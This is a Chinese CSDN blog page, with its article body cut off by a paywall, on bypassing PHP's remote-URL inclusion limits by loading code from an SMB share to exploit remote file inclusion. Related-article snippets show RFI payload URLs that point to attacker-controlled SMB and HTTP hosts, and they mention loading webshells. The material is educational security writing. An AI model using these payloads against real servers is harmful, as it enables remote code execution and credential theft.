PHP远程文件包含(RFI)并绕过远程URL包含限制

最新推荐文章于 2024-10-04 17:59:24 发布
最新推荐文章于 2024-10-04 17:59:24 发布
阅读量1.7k 收藏 1
点赞数
文章标签: 安全 php web docker spring
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuteer_xu/article/details/115475233
版权
本文介绍了在PHP的`allow_url_fopen`和`allow_url_include`禁用时,如何通过SMB服务器实现远程文件包含(RFI)攻击。攻击者利用SMB共享来执行远程PHP代码,并展示了利用DVWA进行的演示。在攻击过程中,不仅成功执行了远程文件,还捕获了NET-NTLMhash。
摘要由CSDN通过智能技术生成


文章来源|MS08067 公众号粉丝投稿

本文作者:VastSky(Ms08067实验室粉丝)


前言

本文我们讲如何绕过远程URL包含限制。在PHP开发环境php.ini配置文里”allow_url_fopen、allow_url_include“均为“off”的情况下,不允许PHP加载远程HTTP或FTP的url进行远程文件包含时。我们依旧可以使用SMB,来加载执行远程文件。

攻击思路

攻击者在发现目标服务器存在本地文件包含的情况下。可以通过配置SMB服务器,启用匿名浏览访问。利用有漏洞的PHP代码从SMB共享里访问PHP程序文件,查看代码是否被执行。

环境设置

1、配置php.ini文件禁用"allow_url_fopen" 和 "allow_url_include"

2、利用具有本地文件包含漏洞的程序,这里我们使用DVWA演示

3、使用impacket攻击框架中的smbserver

查看坏境

当前配置PHP版本为“7.3.4”:

最低0.47元/天 解锁文章
Ms08067安全实验室
关注
PHP远程文件包含
04-29
什么是"远程文件包含漏洞"?回答:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。
利用PHP应用程序中的远程文件包含RFI)并绕过远程URL包含限制
weixin_30745641的博客
06-06 341
来源:http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1 前言 文章讲诉了如何绕过远程URL包含限制。在PHP开发环境php.ini配置文件里”,allow_url_include“为“off”的情况下,不允许PHP加载远程HTTP...
Pikachu-File Inclusion-远程文件包含
最新发布
guanrongl的专栏
10-04 765
是指能够包含远程服务器上的文件并执行。由于远程服务器的文件是我们可控的,因此漏洞一旦存在,危害性会很大。但远程文件包含漏洞的利用条件较为苛刻;因此,在web应用系统的功能设计上尽量不要让前端用户直接传变量给包含函数,如果非要这么做,也一定要做严格的白名单策略进行过滤。再次请求远程文件包含, filename 的值改为http://192.168.3.218:8000:test.php。首先,在D盘下构造一个 test.php 文件 ,可以看到,phpinfo 已经显示;PHP的需要php.ini中配置。
php 远程文件包含配置项,文件包含漏洞总结 - ghtwf01 - Welcome to ghtwf01's blog
weixin_29246195的博客
03-11 560
文件包含简介服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间文件包含函数require()require_once()include()include_once()include和require区别主要是,include在包含的过程中如果出现错误,会抛出一个警告,程序继续正常运行;而require函数出现错误的时候,会直接报错...
php文件包含漏洞(allow_url_include=Off)的绕过方法
weixin_30323961的博客
05-31 2931
分享几个当allow_url_include = Off时的文件包含漏洞的绕过方法。 假设服务端的php代码(aaa.php)如下图所示: 第1种:smb协议 Payload:http://127.0.0.1/aaa.php?path=\\43.5*.**.74\ica\abc1238.htm 这种方法只适用于Windows类型的网站服务器,不能用于Linux服务器。 首先在...
远程文件包含 php,php本地及远程文件包含漏洞
weixin_32323455的博客
04-12 514
php程序中包含有file inclusion的时候,php要开启一下两个功能:allow_url_fopen onallow_url_include on但是开启这两个功能之后伴随的是url漏洞,例如:http://192.168.2.109/DVWA-1.9/vulnerabilities/fi/?page=include.php这个连接是正常的连接,但是如果在page后面访问的如果是C:\...
使用SMB共享来绕过php远程文件包含限制执行RFI的利用
10-16
由于SMB共享是允许匿名访问的,PHP代码将成功加载并执行Web shell,绕过了原本的远程文件包含限制。 总结起来,通过利用SMB共享,攻击者可以在PHP环境禁止远程HTTP/FTP文件包含的情况下,依然实现RFI攻击。这凸显了...
Web安全远程文件包含(RFI)攻击详解与防范
远程文件包含(Remote File Inclusion,RFI)是一种常见的Web应用安全漏洞,它允许攻击者通过将远程URL作为参数传递给`include`或`require`等函数,使得Web应用程序执行非预期的远程文件。这种攻击方式可能导致敏感...
Web应用安全远程文件包含利用.pptx
06-20
远程文件包含(Remote File Inclusion,RFI)】是一种常见的Web应用安全漏洞,它允许攻击者通过操纵应用程序,使其包含并执行远程服务器上的文件。RFI与本地文件包含(Local File Inclusion,LFI)相似,不同之处...
文件包含漏洞-02】文件包含漏洞分类与原理及其空字符安全绕过实验
cc
02-22 3103
文件包含(file inclusion)漏洞,当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。本地文件包含LFI(local file inclusion):当被包含的文件在服务器本地时,可以通过文件路径(相对或绝对)加载(读取和打开)文件,就形成本地文件包含
PHP 远程文件包含的介绍和代码防御
煜铭2011
10-07 2157
0x01 介绍        PHP 应用程序接收到外部输入,但在“require”、“include”或类似函数中使用该输入之前对其进行了错误的限制。在 PHP 的特定版本和配置中,这样就使攻击者能够指定远程位置的 URL,以便使用软件从该位置获取要执行的代码。在其他情况下,攻击者可通过与路径遍历相结合来指定本地文件,其中可能包含 PHP 可以解析的可执行语句。“PHP 远程文件包含”使攻
PHP 网络开发详解之远程文件包含漏洞
10-29
由于PHP支持使用相同的函数(Function)对本地文件和远程文件进行操作。因此,一些恶意用户通过强行使网站上的PHP代码(Code)包含自己的文件来实现执行自己脚本的目的。
php文件包含
m0_64361111的博客
02-28 1483
概念 把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,无需再次编写函数。这一调用文件的过程被称为包含。 原理 文件包含漏洞产生的原因是在通过PHP函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件几乎所有的脚本语言都会提供文件包含的功能,但文件包含漏洞在PHP WebApplication中居多,而在JSP、ASP、ASP.NET程序中却非常少,这是有些语言设计的弊端。在PHP中经常出现文件包含漏洞,但并不意味着其他语言不存在。泄露甚
远程文件包含演示
qq_58683895的博客
11-20 429
简单演示远程文件包含
php文件包含绕过,文件包含漏洞(绕过姿势) | nmask's Blog
weixin_35094408的博客
03-18 801
谁将烟焚散,散了纵横的牵绊文件包含漏洞是渗透测试过程中用得比较多的一个漏洞,主要用来绕过waf上传木马文件。今日在逛Tools论坛时,发现了一种新型的文件包含姿势,在此记录分享,并附上一些文件包含漏洞的基础利用姿势。特殊姿势利用phar://协议特性可以在渗透过程中帮我们绕过一些waf检测,phar:// 数据流包装器自 PHP 5.3.0 起开始有效,貌似可以绕过安全狗。利用过程新建shell....
php远程文件包含漏洞
第二世
04-22 1853
php远程文件包含漏洞2004-3-7作者:Zizzy在这篇文章里我会告诉php远程文件包含漏洞的原理,初涉程序员的人必看。首先的问题是,什么才是”远程文件包含漏洞“?简要的回答是服务器通过php的任意文件包含过滤不严,从而去执行一个恶意文件,这是个程序员过滤上的问题,请记住,所有的cgi程序都有这样的bug。1.找出bug:为了发现目标,我们首先要知道包含两个字的含义,在所有语言里(大多数)
PHP漏洞挖掘之旅——远程文件包含漏洞
kendyhj9999的专栏
05-25 3743
PHP漏洞挖掘之旅——远程文件包含漏洞 2011, April 21, 8:31 AM. PHP学习 Submitted by admin  本篇文章源自《黑客防线》2007年5月刊 转载请注明版权 作者:cnbird[H.U.C]河北泊头杨宁 ===================================   大家好,我是cnbird[H.U.
PHP绕过远程文件头限制,利用PHP应用程序中的远程文件包含RFI)并绕过远程URL包含限制...
weixin_42514921的博客
03-21 311
前言文章讲诉了如何绕过远程URL包含限制。在PHP开发环境php.ini配置文件里”,allow_url_include“为“off”的情况下,不允许PHP加载远程HTTP或FTP url包含远程文件。但是使用SMB依旧可以加载。攻击思路攻击者需要配置SMB服务器,启用匿名浏览访问。利用有漏洞的PHP代码从SMB共享里访问PHP Webshell。配置php.ini文件禁用 "allow_url_...
远程文件包含漏洞:PHP 网络开发详解
PeGroovy的博客
09-29 219
远程文件包含漏洞是指在Web应用程序中,未经适当过滤和验证的用户输入被直接用作文件路径,导致恶意用户可以通过构造特定的请求,将任意文件包含到应用程序的执行环境中。这可能导致攻击者执行任意代码、访问敏感文件或获取系统权限。远程文件包含漏洞通常发生在使用PHP的动态网页应用程序中,其中包含了用于包含其他文件的函数,如includerequire等。当用户可以控制被包含文件的路径时,攻击者可以通过构造特定的请求参数来实现远程文件包含php?在上述代码中,$page。
PHP远程文件包含漏洞详解与实例剖析
PHP开发中,"远程文件包含漏洞"(Remote File Inclusion,RFI)是一种常见的安全风险,它源于服务器上PHP程序的一个设计特点,允许通过特定函数或语法动态加载外部文件。当这些函数在处理用户输入时没有正确过滤或...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值